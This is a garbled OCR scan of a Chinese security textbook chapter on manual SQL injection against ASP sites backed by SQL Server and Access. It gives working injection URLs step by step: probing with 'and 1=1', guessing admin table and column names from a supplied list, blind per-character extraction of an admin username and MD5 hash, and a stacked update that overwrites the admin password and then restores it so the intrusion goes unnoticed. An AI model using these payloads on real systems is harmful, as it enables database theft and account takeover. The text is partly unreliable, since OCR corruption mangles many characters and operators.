E-D- OO qu rm eed ome y E»IGI- o. 


Microsoft OLE DB Provider for ODBC Drivers ti '80040e37" 


[Microsoft] [ODBC SQL Server Driver] [SQL Server) HRE 'adain' X3. 


/detail.asp. fT 22 


图 6-10 猜测 表 名 失败 


a mum im ^) 


继续 猜测 表 名 ,如 图 6-11 所 示 ,在 http://www. xxx. com. cn/detail. asp? productid— 
392 后 面 加 “and (select count ( * ) from adminuser) > = 0". 32 [n] 1E % 9t mi , bi BH ff dE 


adminuser X ,猜测 成 功 。 


注意 ,猜测 表 名 时 也 可 以 使 用 如 下 形式 : 


http://www. xxx. com. cn/detail.asp?productid = 392 and exists(select * from admin) 
http://www. xxx. com. cn/detail.asp?productid = 392 and exists(select * from adminuser) 


a itai]. CGO ) 


我 院 召开 “平安 奥运 ”工作 部 署 会 


图 6-11 猜测 表 名 成 功 


K 6-1 列 出 了 常见 的 管理 员 表 名 ,账户 字段 名 称 和 密码 字段 名 称 , 在 进行 表 名 、 字 段 名 


猜测 时 仅 供 参考 。 
表 6-1 常见 的 表 名 和 字段 名 

管理 员 表 名 账户 字段 名 称 密码 字段 名 称 
admin username password 
manage name adminpassword 
admin userinfo u name passwd 
user administrators serpass 
password userid pwd 
table admin adminuser adminpass 
userinfo user user password 
a admin admin username admin password 
t admin uid pword 
users usr user pass 
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续 表 

管理 员 表 名 账户 字段 名 称 密码 字段 名 称 
adminuser admin admin passwd 
company usr n name pwd 
article admin user name pws 
book adminname user pwd 
bbs admin name adminpwd 
config adminpass admin pass 
admins admin user passwords 
adminusers adminusername passwds 
admin user user admin admin pwd 


S8 62b. 猜测 字段 名 (用 户 名 和 密码 字段 ) 。 

猜 出 表 名 以 后 ,将 count( x* ) 替 换 成 count( 字 段 名 ) ,用 同样 的 方法 猪 解 字段 名 。 

如 图 6-12 所 示 ,在 浏览 器 地 址 栏 中 http://www. xxx. com. cn/detail. asp? productid — 392 
后 面 加 “and exists (select count(name) from adminuser) > — 0". f£ Enter 键 后 ,服务 器 返 
回 错误 提示 ,说 明 不 存在 name 用 户 名 字段 。 


© © He 


Microsoft OLE DB Provider for ODBC Drivers MU '80040eld" ^| 
Microsoft] [ODBC SQL Server Driver) [SQL Server] 列 名 "nane” 无 效 。 | 
/detail.asp. ff 22 加 


图 6-12 ”猜测 用 户 名 字段 名 失败 


继续 猜测 用 户 名 字段 名 ,如 图 6-13 所 示 , 在 http://www. xxx. com. cn/detail. asp? 
productid — 392 后 面 加 “and (select count(admin_name) from adminuser) 二 一 0”, 返 回 正常 
页 面 , 说 明 存 在 admin_name 用 户 名 字段 名 ,猜测 成 功 。 


E- >- EO dg ame 


>) Oe TS 


我 院 召开 “平安 奥运 ”工作 部 署 会 


图 6-13 ”猜测 用 户 名 字段 名 成 功 


然后 猜测 密码 字段 名 。 

假设 http://www. xxx. com. cn/detail. asp? productid — 392 and (select count(admin pwd) 
from adminuser)  — 0 返回 正常 页 面 , 则 密码 字段 名 猜测 成 功 ,密码 字段 名 是 admin. pwd. 

第 7 步 : 猜测 用 户 名 。 已 知 表 adminuser 中 存在 admin. name 字段 ,下 面 使 用 ASCII 逐 
字 解 码 法 猜测 用 户 名 。 

首先 ,猜测 用 户 名 的 长 度 。 

如 图 6-14 所 示 , 在 浏览 器 地 址 栏 中 http://www. xxx. com. cn/detail. asp? productid 一 392 
后 面 加 “and (select top 1 lenCadmin name) from adminuser) 二 11”, 其 含义 是 取 第 一 条 记 
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图 6-14 用 户 名 长 度 大 于 11 


继续 猜测 用 户 名 长 度 , 如 图 6-15 所 示 , 在 http://www. xxx. com. cn/detail. asp? 
productid — 392 后 面 加 “and (select top 1 len(admin_name) from adminuser) 二 12”, 返 回 错 
误 页 面 ,说 明 用 户 名 的 长 度 不 大 于 12, 所 以 用 户 名 的 长 度 是 12。 


BOF M EOF 中 有 一 个 是 “ 真 ”， 惑 者 当前 的 记录 已 被 名 只 ， 所 需 的 换 作 要 求 一 个 当前 的 记录 。 


/detail.asp ff 70 
————————————Á————————————M dá 


图 6-15 用 户 名 长 度 不 大 于 12 


前 面 的 测试 过 程 总 结 为 : 如 果 top 1( 第 一 条 记录 ) 的 admin_name 长 度 大 于 0, 则 条 件 
成 立 ; 接着 依次 测试 大 于 1、 大 于 2、 大 于 3 的 情况 (为 了 加 快 猜测 速度 ,可 以 取 跨 越 值 ,如 大 
于 5 大 于 10 大 于 16) ,一 直到 条 件 不 成 立 为 止 ,比如 大 于 11 成 立 , 大 于 12 不 成 立 ,就 可 以 
得 到 lenCadmin name) —12, 

得 到 admin, name 的 长 度 以 后 ,用 unicodeCsubstringCadmin name. N, 1)) 获 得 第 N 
位 字符 的 ASCII 码 。 

CD 猜测 第 1 个 字符 。 如 图 6-16 所 示 , 从 productid — 392 and (select top 1 unicode 
CsubstringCadmin name. 1. 1)) from adminuser) 二 0 到 productid= 392 and (select top 1 
unicode(substringCadmin name. 1, 1)) from adminuser) 7121 显示 正常 ; 如 图 6-17 所 示 ， 
productid— 392 and (select top 1 unicode(substringCadmin name. 1. 1)) from adminuser) —122 


显示 不 正常 ,得 第 1 个 字符 是 z( 查 ASCII 码 字符 表 ,字符 z 的 十 进 制 编码 是 122) 。 


我 院 召 开 “平安 奥运 ”工作 部 署 会 


图 6-16 猜测 第 1 个 字符 


为 了 加 快 猜测 速度 ,可 以 取 跨 越 值 ,如 大 于 50、 大 于 80、 大 于 110 等 ,也 可 以 用 折 半 法 
猜测 。 

注意 : 英文 .数字 和 其 他 可 视 符 号 的 ASCI 码 在 1 一 128 之 间 。 

© 猜测 第 2 个 字符 。 从 productid — 392 and (select top 1 unicode(substring(admin_ 
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$-»-C€ Ga: 


ADODB. Field WU '00a0bcd" 
BOF M EOF PHAR". SUE S Pic CAR. MANRFER- INNER 
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图 6-17 继续 猜测 第 1 个 字符 


name. 2. 1)) from adminuser) 二 0 到 productid — 392 and (select top 1 unicode( substring 
Cadmin, name. 2. 1)) from adminuser) 7103 显示 正常 ; productid — 392 and (select top 1 
unicodeCsubstringCadmin name. 2. 1)) from adminuser) —104 显示 不 正常 ,得 到 第 2 个 字 
符 是 h( 查 ASCI 码 字 符 表 , 字 符 b 的 十 进 制 编码 是 104) 。 

© 猜测 第 3 个 字符 。 从 productid — 392 and (select top 1 unicode(substring(admin_ 
name. 3, 1)) from adminuser) 二 0 到 productid — 392 and (select top 1 unicode( substring 
Cadmin, name. 3. 1)) from adminuser) 二 110 显示 正常 ; productid — 392 and (select top 1 
unicode(substringCadmin, name. 3. 1)) from adminuser) 111 显示 不 正常 ,得 到 第 3 个 字 
符 是 o( 查 ASCI 码 字 符 表 ,字符 o 的 十 进 制 编码 是 111) 。 

按照 上 述 步骤 猜测 第 4 一 12 个 字符 ,最 终 得 到 用 户 名 是 zhoushanshan, 

K 6-2 给 出 了 Access 和 SQL Server 中 常用 的 函数 及 命令 。 


表 6-2 Access 和 SQL Server 中 常用 的 函数 及 命令 


Access 和 SQL Server 中 常用 的 函数 及 命令 作 用 
Access: asc( 字 符 ) SQL Server: unicode( 字 符 ) | 返回 某 字 符 的 ASCI 码 
Access: chr( 数 字 ) SQL Server: nchar( 数 字 ) 与 asc 相反 ,根据 ASCII 码 返回 字符 
Access; mid (字符 串 ，N，L) SQL Server: | 返回 字符 串 从 N 个 字符 起 长 度 为 工 的 子 字符 串 , 即 
substring( 字 符 串 , N，L) N 到 NAL ZFA 
Access; abc( 数 字 ) SQL Server; abc( 数 字 ) 返回 数字 的 绝对 值 ( 在 猜 解 汉字 时 会 用 到 ) 
Access; A between B And C SQL Server; A 判断 A 是 否 界 于 B 与 C 之 间 
between B And C 


第 8 步 : 猜测 用 户 密码 。 按 照 猜测 用 户 名 的 方法 猜测 用 户 密码 ,一 般 情况 下 ,密码 是 经 
MD5 加 密 后 存 人 表 中 的 ,如 果 成 功 ,得 到 的 也 是 加 密 后 的 密码 ,所 以 还 要 对 密码 进行 破解 。 

第 9 步 : 修改 密码 。 如 果 破 解密 码 的 难度 很 大 ,那么 可 以 修改 已 经 猜测 的 用 户 名 对 应 
的 密码 , 即 : 

http://www. xxx. com. cn/detail.asp?productid = 392; 

update adminuser set admin pwd = 'a0b923820dcc509a' where admin name = 'zhoushanshan'; 一 一 

a0b923820dcc509a 是 1 的 MD5 值 , 即 把 密码 改 成 1. zhoushanshan 为 已 猜测 的 用 户 名 。 
可 以 用 同样 的 方法 把 密码 改 为 原来 的 值 .目的 是 不 让 真实 的 zhoushanshan 用 户 发 现 系统 被 
ART. 


6.1.2. 实例 : 注入 攻击 Access 


本 节 要 注入 网 站 的 一 个 URL 是 http://www. yyy. com/productDetail c. asp? ID= 
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568, 由 于 只 是 为 了 介绍 注入 网 站 的 方法 ,并 未 实质 入侵 该 网 站 ,同时 也 是 为 了 对 该 网 站 保 
密 , 因 此 在 后 面 的 截图 中 隐藏 了 该 网 站 的 相关 信息 。 

第 1 步 : 加 单 引号 。 如 图 6-18 所 示 , 在 浏览 器 地 址 栏 中 http://www. yyy. com/ 
productDetail c. asp? ID— 568 后 面 加 一 个 单 引号 , 按 Enter 键 后 ,服务 器 返回 错误 提示 o 


€-».Qodqia Mp /fr E een/preductbetail. c. oo?mcsd ) ale) ea. «) 
"PEBBE Microsoft JET Database Engine MR "80040614" 了 
cron ase Engine 
经 册 第 规 系列 


字符 森 的 语法 错误 EEA Product. ID=568 ”中 。 


/productDetail_c.asp, fT 277 


图 6-18 加 单 引号 


从 返回 的 错误 提示 可 知 : 网 站 使 用 的 是 Access 数据 库 , 通 过 JET 引擎 连接 数据 库 而 不 
是 通过 ODBC 来 连接 数据 库 , 该 SQL 语句 所 查询 的 表 中 有 一 名 为 ID 的 字段 ,程序 存在 过 
滤 不 严密 的 问题 (因为 输入 的 单 引号 被 程序 解析 执行 了 ) 。 

第 2 步 : 测试 "and 1 二 1”"。 如 图 6-19 所 示 , 在 浏览 器 地 址 栏 中 http://www. yyy. com/ 
productDetail c. asp? ID—568 后 面 加 “and 1=1”, fk Enter 键 后 ,服务 器 返回 正常 页 面 。 


qe -CO or ETT ewe espace y | v G--- 4) 


图 6-19 测试 “and 1=1” 


第 3 步 : 测试 “and 1—2", WME 6-20 所 示 ,在 浏览 器 地 址 栏 中 http://www. yyy. com/ 
productDetail c. asp? ID—568 后 面 加 “and 1 一 2”. 按 Enter 键 后 ,服务 器 返回 异常 页 面 。 


€-2-CGodqr rm a i i >) Ci a) 


"ranz Cm- > E 
EROS GIRO 和 前 图 比较 ， 页 面 异常 
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Ci | E 


图 6-20 测试 “and 1—2" 


第 2 步 和 第 3 步 就 是 经 典 的 1 二 1、1 二 2 测试 法 。 

如 果 一 个 网 站 可 以 被 注入 ,那么 第 2 步 显 示 正 常 网 页 ,第 3 步 显示 错误 提示 或 异常 
页 面 。 

如 果 一 个 网 站 不 可 以 被 注入 ,那么 第 2 步 和 第 3 步 都 会 显示 错误 提示 或 异常 页 面 。 

第 4 步 : 判断 数据 库 类 型 。Access 和 SQL Server 都 有 自己 的 系统 表 , 比 如 存放 数据 库 
中 所 有 对 象 的 表 : Access 是 在 系统 表 msysobjects 中 ,但 在 Web 环境 下 读 该 表 会 提示 “没有 
权限 ”; SQL Server 是 在 表 sysobjects 中 ,在 Web 环境 下 可 正常 读 取 。 

在 确认 可 以 注入 的 情况 下 ,使 用 下 面 的 语句 : 
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http://www. yyy. com/productDetail_c.asp?ID = 568 and (select count( * ) from sysobjects)> 0 


如 果 数 据 库 是 Access, 由 于 找 不 到 表 sysobjects. 服务 器 返回 如 图 6-21 所 示 的 错误 
提示 。 


€-»-Q 3l EUN eee UD Gieo. a 
ER Microsoft JET Database Engine 80040637" A 


BARNEA 

JEU GEAEXON Microsoft Jet 数据 库 引 罕 找 不 到 输入 表 葡 查询 “zysobjectz' 。 确定 它 是 否 存在 ， 以 及 它 的 名 国 
sm. teeren PNNSATEM. J 
ERBE QE) /productDetail_c. asp, ff 277 


图 6-21 select count( * ) from sysobjects 


使 用 下 面 的 语句 : 
http://www. yyy. com/productDetail c.asp?ID = 568 and (select count( * ) from msysobjects)>0 


如 果 是 Access 数据 库 , 服 务 器 会 返回 错误 提示 “在 'msysobjects' 上 没有 读 取 数据 权限 ”， 
如 图 6-22 所 示 ,如 果 Web 程序 有 容错 能 力 ,那么 服务 器 返回 的 页 面 也 会 与 原 页 面 不 同 。 
由 上 可 以 判断 数据 库 用 的 是 Access。 


和 和 -号 -@@ 济世 D — ERR E CE & 
—— Microsoft JET Database Engine 9 


^ 
FARREN E 
m TitRGieEa 在 “nsysobjects， 上 没有 该 取 数 据 权限 。 s 
HE. SUENAN /productDetail c.asp. ff 277 a 


图 6-22 select count( * ) from msysobjects 


第 5 步 : 猜测 表 名。 猜测 表 名 时 也 可 以 使 用 如 下 形式 : 


http://www. yyy. com/productDetail c.asp?ID = 568 and (select count( * ) from admin)» = 0 


http://www. yyy. com/productDetail c. asp? ID = 568 and exists (select * from 
admin) 是 向 数据 库 查询 是 否 存在 admin 表 , 如 果 存 在 则 返回 正常 页 面 ,不 存在 会 返回 错误 
提示 。 如 此 循环 ,直至 猜测 到 表 名 为 止 。 

返回 正常 页 面 时 ,猜测 到 管理 员 表 是 admin, 

K 6-1 列 出 了 常见 的 管理 员 表 名 ,猜测 时 仅 供 参 考 。 

第 6 步 : 猜测 字段 名 (用 户 名 和 密码 字段 )。 表 名 猜 出 来 后 ,将 count( x ) 替 换 成 count 
(字段 名 ) ,用 同样 的 原理 猜测 字段 名 。 

首先 猜测 用 户 名 字段 : 


www. yyy. com/productDetail_c.asp?ID= 568and (select count(username) from admin)> = 0 


www. yyy. com/productDetail c. asp? ID = 568 and exists (select username from 
admin) 返 回 正常 页 面 ,用 户 名 字段 猜测 成 功 , 用 户 名 字段 名 是 username, 
然后 猜测 密码 字段 : 


www. yyy. com/productDetail_c.asp?ID = 568and (select count(password) from admin)» = 0 
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www. yyy. com/productDetail c. asp? ID — 568 and exists ( selectpassword from 
admin) 返 回 正常 页 面 : 则 密码 字段 猜测 成 功 , 密 码 字 段 名 是 password. 

第 7 步 : 猜测 用 户 名 。 已 知 表 admin 中 存在 username 字段 ,下 面 使 用 ASCI 逐 字 解码 
法 猜测 用 户 名 。 

猜测 用 户 名 的 长 度 : 

www. yyy. com/productDetail c. asp? ID—568 and (select top 1 lenCusername) from 
admin) 二 4 返回 正常 页 面 ; www. yyy. com/productDetail c. asp? ID—568 and (select top 
1 len(username) from admin) —5 返回 不 正常 页 面 ,可 知 用 户 名 长 度 是 5。 

在 得 到 用 户 名 长 度 后 ,用 asc (mid (username,，N, 1)) 获 得 第 N 位 字符 的 ASCII 码 。 

(1) 猜测 第 1 个 字符 

从 ID=568 and (select top 1 asc (mid (username, 1. 1)) from admin) —0 到 ID=568 
and (select top 1 asc (mid (username, 1. 1)) from admin) —96 显示 正常 ,而 ID=568 and 
(select top 1 asc (mid (username, 1. 1)) from admin) 797 显示 不 正常 ,得 第 1 个 字符 是 a 
Cft ASCI 码 字符 表 , 字 符 a 的 十 进 制 编码 是 97) 。 

(2) 猜测 第 2 个 字符 

AM ID—568 and (select top 1 asc (mid (username, 2, 1)) from admin) —0 到 ID 一 568 
and (select top 1 asc (mid (username, 2. 1)) from admin) —99 显示 正常 ,而 ID—568 and 
(select top 1 asc (mid (username, 2. 1)) from admin) 7100 显示 不 正常 ,得 第 2 个 字符 是 
d( 查 ASCI 码 字 符 表 ,字符 d 的 十 进 制 编码 是 100) 。 

CD 猜测 第 3 个 字符 

从 ID— 568 and (select top 1 asc (mid (username, 3. 1)) from admin) 0 到 ID—568 
and (select top 1 asc (mid (username, 3. 1)) from admin) —108 显示 正常 ,而 ID=568 and 
(select top 1 asc (mid (username, 3. 1)) from admin) 77109 显示 不 正常 ,得 第 3 个 字符 是 
m ASCI 码 字 符 表 , 字 符 m 的 十 进 制 编码 是 109) 。 

(4) 猜测 第 4 个 字符 

JA ID— 568 and (select top 1 asc (mid (username, 4. 1)) from admin) 二 0 到 ID—568 
and (select top 1 asc (mid (username, 4. 1)) from admin) —104 显示 正常 ,而 ID 一 568 and 
(select top 1 asc (mid (username, 4. 1)) from admin) 7105 显示 不 正常 ,得 第 4 个 字符 是 
iE ASCI 码 字 符 表 ,字符 i 的 十 进 制 编码 是 105) 。 

(5) 猜测 第 5 个 字符 

从 ID— 568 and (select top 1 asc (mid (username, 5. 1)) from admin) —0 到 ID 一 568 
and (select top 1 asc (mid (username, 5. 1)) from admin) 109 显示 正常 ,而 ID= 王 568 and 
(select top 1 asc (mid (username, 5. 1)) from admin) >110 显示 不 正常 ,得 第 5 个 字符 是 
n( 查 ASCI 码 字 符 表 ,字符 n 的 十 进 制 编码 是 110). 

最 终 得 到 用 户 名 是 admin, 

K 6-2 给 出 了 Access 和 SQL Server 中 常用 的 函数 及 命令 。 

第 8 步 : 猜测 用 户 密码 。 已 知 表 admin 中 存在 password 字段 .下 面 猜测 用 户 admin 的 
密码 。 
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猜测 密码 的 长 度 : 

www. yyy. com/productDetail c. asp? ID—568 and (select top 1 lenCpassword) from 
admin) 15 返回 正常 页 面 ,www. yyy. com/productDetail c. asp? ID— 568 and (select top 
1len(password) from admin) — 16 返回 不 正常 页 面 ,可 知 用 户 admin 的 密码 长 度 是 16(md5 
加 密 后 的 ) 。 

在 得 到 用 户 admin 的 密码 长 度 后 ,就 可 以 用 asc (mid (password. N, 1)) 获 得 第 NN 位 
字符 的 ASCII 码 。 

CD 猜测 第 1 个 字符 

从 ID—568 and (select top 1 asc (mid (password, 1. 1)) from admin) —0 到 ID—568 
and (select top 1 asc (mid (password, 1. 1)) from admin) 56 显示 正常 ,而 ID—568 and 
select top 1 asc (mid (password, 1. 1)) from admin) 757 显示 不 正常 ,得 到 第 1 个 字符 是 
9 Cft ASCI 码 字符 表 , 字 符 9 的 十 进 制 编码 是 57) 。 

(2) 猜测 第 2 个 字符 

从 ID—568 and (select top 1 asc (mid (password, 2. 1)) from admin) —0 到 ID—568 
and (select top 1 asc (mid (password. 2. 1)) from admin) 56 显示 正常 ,而 ID—568 and 
(select top 1 asc (mid (password, 2. 1)) from admin) 757 显示 不 正常 ,得 到 第 2 个 字符 是 
9 Cft ASCI 码 字 符 表 , 字 符 9 的 十 进 制 编码 是 57) 。 

CD 猜测 第 3 个 字符 

从 ID—568 and (select top 1 asc (mid (password, 3, 1)) from admin) —0 到 ID—568 
and (select top 1 asc (mid (password. 3. 1)) from admin) 50 显示 正常 ,而 ID=568 and 
(select top 1 asc (mid (password. 3. 1)) from admin) 51 显示 不 正常 ,得 到 第 3 个 字符 是 
3( 查 ASCI 码 字 符 表 ,字符 3 的 十 进 制 编码 是 51) 。 

(4) 猜测 第 4 个 字符 

从 ID—568 and (select top 1 asc (mid (password. 4. 1)) from admin) 0 到 ID 一 568 
and (select top 1 asc (mid (password. 4. 1)) from admin) —96 显示 正常 ,而 ID 一 568 and 
(select top 1 asc (mid (password. 4. 1)) from admin) 97 显示 不 正常 ,得 到 第 4 个 字符 是 
a( 查 ASCI 码 字 符 表 ,字符 a 的 十 进 制 编码 是 97). 

(5) 猜测 第 5 个 字符 

从 ID— 568 and (select top 1 asc (mid (password. 5. 1)) from admin) —0 到 ID—568 
and (select top 1 asc (mid (password. 5. 1)) from admin) —50 显示 正常 ,而 ID 一 568 and 
(select top 1 asc (mid (password. 5. 1)) from admin) 751 显示 不 正常 ,得 到 第 5 个 字符 是 
3( 查 ASCI 码 字符 表 , 字 符 3 的 十 进 制 编码 是 51) 。 

(6) 猜测 第 6 个 字符 

从 ID— 568 and (select top 1 asc (mid (password. 6. 1)) from admin) —0 到 ID 一 568 
and (select top 1 asc (mid (password. 6. 1)) from admin) —53 显示 正常 ,而 ID= 王 568 and 
(select top 1 asc (mid (password. 6. 1)) from admin) >54 显示 不 正常 ,得 到 第 6 个 字符 是 
6( 查 ASCI 码 字符 表 ,字符 6 的 十 进 制 编码 是 54) 。 

CO 猜测 第 7 个 字符 

从 ID— 568 and (select top 1 asc (mid (password. 7. 1)) from admin) —0 到 ID=568 
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and (select top 1 asc (mid (password. 7. 1)) from admin) —53 显示 正常 ,而 ID= 王 568 and 
Cselect top 1 asc (mid (password. 7. 1)) from admin) >54 显示 不 正常 ,得 到 第 7 个 字符 是 
6( 查 ASCI 码 字 符 表 ,字符 6 的 十 进 制 编码 是 54) 。 

(8) 猜测 第 8 个 字符 

从 ID— 568 and (select top 1 asc (mid (password. 8. 1)) from admin) —0 到 ID—568 
and (select top 1 asc (mid (password. 8. 1)) from admin) — 101 显示 正常 ,而 ID==568 and 
(select top 1 asc (mid (password. 8. 1)) from admin) 102 显示 不 正常 ,得 到 第 8 个 字符 
AE (Cft ASCI 码 字 符 表 ,字符 工 的 十 进 制 编码 是 102) 。 

(9) 猜测 第 9 个 字符 

从 ID—568 and (select top 1 asc (mid (password. 9. 1)) from admin) 70 到 ID—568 
and (select top 1 asc (mid (password. 9. 1)) from admin) —53 显示 正常 ,而 ID 一 568 and 
(select top 1 asc (mid (password. 9. 1)) from admin) >54 显示 不 正常 ,得 到 第 9 个 字符 是 
6 Cft ASCI 码 字 符 表 ,字符 6 的 十 进 制 编码 是 54) 。 

(10) 猜测 第 10 个 字符 

从 ID—568 and (select top 1 asc (mid (password, 10, 1)) from admin) 二 0 到 ID= 
568 and (select top 1 asc (mid (password. 10. 1)) from admin) —48 显示 正常 ,而 ID 一 568 
and (select top 1 asc (mid (password, 10. 1)) from admin) 49 显示 不 正常 ,得 到 第 10 个 
字符 是 1( 查 ASCI 码 字符 表 , 字 符 1 的 十 进 制 编码 是 49) 。 

aD 猜测 第 11 个 字符 

从 ID—568 and (select top 1 asc (mid (password, 11, 1)) from admin) 二 0 到 ID= 
568 and (select top 1 asc (mid (password. 11. 1)) from admin) 101 显示 正常 ,而 ID= 
568 and (select top 1 asc (mid (password. 11. 1)) from admin) 102 显示 不 正常 ,得 到 第 
11 个 字符 是 {( 查 ASCI 码 字符 表 , 字 符 工 的 十 进 制 编码 是 102) 。 

(12) 猜测 第 12 个 字符 

从 ID—568 and (select top 1 asc (mid (password. 12. 1)) from admin) 二 0 到 ID= 
568 and (select top 1 asc (mid (password. 12. 1)) from admin) 99 显示 正常 ,而 ID 一 568 
and (select top 1 asc (mid (password. 12. 1)) from admin) 100 显示 不 正常 ,得 到 第 
12 个 字符 是 d( 查 ASCI 码 字 符 表 ,字符 d 的 十 进 制 编码 是 1000, 

(13) 猜测 第 13 个 字符 

从 ID=568 and (select top 1 asc (mid (password. 13. 1)) from admin) 0 到 ID= 
568 and (select top 1 asc (mid (password. 13. 1)) from admin) 752 显示 正常 ,而 ID 一 568 
and (select top 1 asc (mid (password, 13. 1)) from admin) 753 显示 不 正常 ,得 到 第 13 个 
字符 是 5( 查 ASCI 码 字符 表 , 字 符 5 的 十 进 制 编码 是 53). 

(14) 猜测 第 14 个 字符 

从 ID—568 and (select top 1 asc (mid (password. 14. 1)) from admin) 二 0 到 ID= 
568 and (select top 1 asc (mid (password. 14. 1)) from admin) —48 显示 正常 ,而 ID 一 568 
and (select top 1 asc (mid (password. 14. 1)) from admin) 749 显示 不 正常 ,得 到 第 14 个 
字符 是 1( 查 ASCI 码 字符 表 , 字 符 1 的 十 进 制 编码 是 49) 。 
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(15) 猜测 第 15 个 字符 

从 ID— 568 and (select top 1 asc (mid (password. 15. 1)) from admin) 二 0 到 ID= 
568 and (select top 1 asc (mid (password. 15. 1)) from admin) —56 显示 正常 ,而 ID 一 568 
and (select top 1 asc (mid (password. 15. 1)) from admin) 7757 显示 不 正常 ,得 到 第 15 个 
字符 是 9( 查 ASCI 码 字符 表 , 字 符 9 的 十 进 制 编码 是 57) 。 

(16) 猜测 第 16 个 字符 

从 ID=568 and (select top 1 asc (mid (password. 16. 1)) from admin) —0 到 ID= 
568 and (select top 1 asc (mid (password. 16. 1)) from admin) —96 显示 正常 ,而 ID 一 568 
and (select top 1 asc (mid (password. 16. 1)) from admin) 797 显示 不 正常 ,得 到 第 16 个 
字符 是 a( 查 ASCI 码 字 符 表 , 字 符 a 的 十 进 制 编码 是 97). 

最 终 得 到 md5 密码 是 993a366f{61fd519a, 然 后 要 对 密码 进行 破解 。 

注意 : 猜 解 Access 时 只 能 用 ASCII 逐 字 解码 法 ,SQL Server 也 可 以 用 这 种 方法 ,但 是 
如 果 能 用 MS SQL Server 的 报错 信息 把 相关 信息 暴露 出 来 ,会 极 大 地 提高 效率 和 准确 率 。 


6.1.3 SQL 注入 式 攻击 的 原理 及 技术 汇总 


SQL(Structured Query Language, 结 构 化 查询 语言 ) 语 言 能 够 访问 数据 库 , SQL 语言 
有 很 多 不 同 的 版 本 ,不 同 版 本 的 SQL 语言 对 相同 的 关键 字 SELECT, UPDATE, 
DELETE、INSERT、CREATE、ALTER 和 DROP) 有 相似 的 使 用 方式 ,当前 的 主流 SQL i 
言 是 SQL99。SQL 能 够 执行 获取 数据 库 的 信息 、 对 数据 库 查询 、 向 数据 库 中 插入 新 的 记录 、 
加 除数 据 库 中 的 记录 和 更 新 数据 库 中 的 记录 等 操作 。 

SQL 注入 攻击 是 黑客 对 数据 库 进行 攻击 的 常用 手段 之 一 。 随 着 B/S 模式 应 用 开发 的 
流行 ,使 用 该 模式 编写 应 用 程序 的 程序 员 也 越 来 越 多 。 由 于 程序 员 的 水 平 及 经 验 参 差 不 齐 ， 
相当 一 部 分 程序 员 在 编写 代码 时 ,没有 对 用 户 输入 数据 的 合法 性 进行 判断 ,使 应 用 程序 存在 
安全 隐患 。 用 户 可 以 提交 一 段 数 据 库 查 询 代 码 .根据 程序 返回 的 结果 ,获得 某 些 他 想 得 知 的 
数据 ,这 就 是 所 谓 的 SQL Injection, 即 SQL 注入 。 

1. 数据 库 系统 

数据 库 系 统 分 为 数据 库 和 数据 库 管 理 系 统 : 数据 库 是 存放 数据 的 地 方 ,数据 库 管 理 系 
统 是 管理 数据 库 的 软件 。 

数据 库 中 数据 的 存储 结构 称 数据 模型 。 有 4 种 常见 的 数据 模型 . 层次 模型 、 网 状 模型 、 
关系 模型 和 面向 对 象 模型 。 其 中 关系 模型 是 最 主要 的 数据 模型 。 

MS Access, MS SQL Server, Oracle, MySQL, Postgres, Sybase, Infomix 和 DB2 等 都 
是 关系 数据 库 系 统 。 

表 是 一 个 关系 数据 库 的 基本 组 成 元 素 ,将 相关 信息 按 行 和 列 组 合 排列 , 行 称 为 记录 , 列 
称 为 域 ,每 个 域 称 为 一 个 字段 。 每 条 记录 都 由 多 个 字段 组 成 ,每 个 字段 的 名 字 称 为 字段 名 ， 
每 个 字段 的 值 称 为 字段 值 , 表 中 的 每 一 行 ( 即 每 一 条 记录 ) 都 拥有 相同 的 结构 。 

2. SQL 注入 的 条 件 

SQL 注入 攻击 是 一 种 利用 用 户 输入 构造 SQL 语句 的 攻击 。 如 果 Web 应 用 程序 没有 
适当 地 检测 用 户 输入 的 信息 ,攻击 者 就 有 可 能 改变 后 台 执 行 的 SQL 语句 的 结构 。 由 于 程序 
运行 SQL 语句 时 的 权限 与 当前 该 组 件 ( 如 数据 库 服 务 器 `Web 服务 器 等 ) 的 权限 相同 ,而 这 
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些 组 件 一 般 的 运行 权限 都 很 高 ,而且 经 常 是 以 管理 员 的 权限 运行 ,所 以 攻击 者 获得 数据 库 的 
完全 控制 权 后 ,就 可 能 执行 系统 命令 。SQL 注入 是 现今 存在 最 广泛 的 Web 漏洞 之 一 ,是 存 
在 于 Web 应 用 程序 开发 中 的 漏洞 ,不 是 数据 库 本 身 的 问题 。 

只 有 调用 数据 库 的 动态 页 面 才 有 可 能 存在 注入 漏洞 ,动态 页 面包 括 ASP.JSP.PHP, 
Perl 和 CGI 等 。 当 访问 一 个 网 页 时 ,如 果 URL 中 包含 “asp? id 一 ”php? id 一 ”或 者 “jsp? 
id 二 ”等 类 似 内 容 ,那么 此 时 就 是 调用 数据 库 的 动态 页 面 了 ,“?” 后 面 的 id 称 变量 “= 一” 后 面 
的 值 称 参数 。 

注入 漏洞 存在 的 一 个 重要 条 件 是 程序 对 用 户 提交 的 变量 没有 进行 有 效 的 过 滤 ,就 直接 
放 入 SQL 语句 中 。 

据 统 计 , 网 站 用 ASP 十 MS Access 或 MS SQL Server 的 占 70% 以 上 ,PHP 十 MySQL 
的 占 20% ,其 他 的 不 到 10%。 

3. 数据 库 手工 注入 过 程 

下 面 主 要 介绍 对 ASP 页 面 的 注入 。 

OD 寻找 注入 点 

在 一 个 调用 数据 库 的 网 址 后 面 分 别 加 上 “and 1— 1" Cand 前 后 各 有 一 个 空格 ) 和 “and 1 一 
2”, 如 果 加 入 “and 1 二 1” 返 回 正常 的 页 面 ( 和 没有 加 “and 1 二 1” 时 的 页 面 一 样 ), 而 加 入 “and 
1 二 2” 返 回 错误 的 页 面 ( 和 没有 加 “and 1 二 2” 时 的 页 面 不 一 样 ), 就 可 以 证 明 这 个 页 面 存 在 注 
和 人 漏洞 。 

比如 : 在 http://www. xxx. edu. cn/test. asp? id—89 这 个 网 址 后 面 加 上 “and 1—1". 
网 址 就 变 成 了 http://www. xxx. edu. cn/test. asp? id 一 89 and 1 王 1, 用 浏览 器 打开 该 网 
页 ,如 果 返 回 正常 的 页 面 , 则 将 网 址 改 为 http://www. xxx. edu. cn/test. asp? id 一 89 and 1 一 2; 
如 果 返 回 错误 的 页 面 ,说 明 该 网 页 http://www. xxx. edu. cn/test. asp? id—89 存在 注入 漏 
洞 (存在 注入 漏洞 的 网 页 称 为 注入 点 ) 。 

但 是 .有 些 网 页 不 可 以 这 样 判断 , 比 如 页 面 http://www. yyy. edu. en/change. asp? id= 
ad56 ,不 管 加 入 “and 1 王 17 还 是 “and 1 二 2”, 都 返回 错误 的 页 面 ,此 时 就 要 尝试 男 一 种 方法 来 
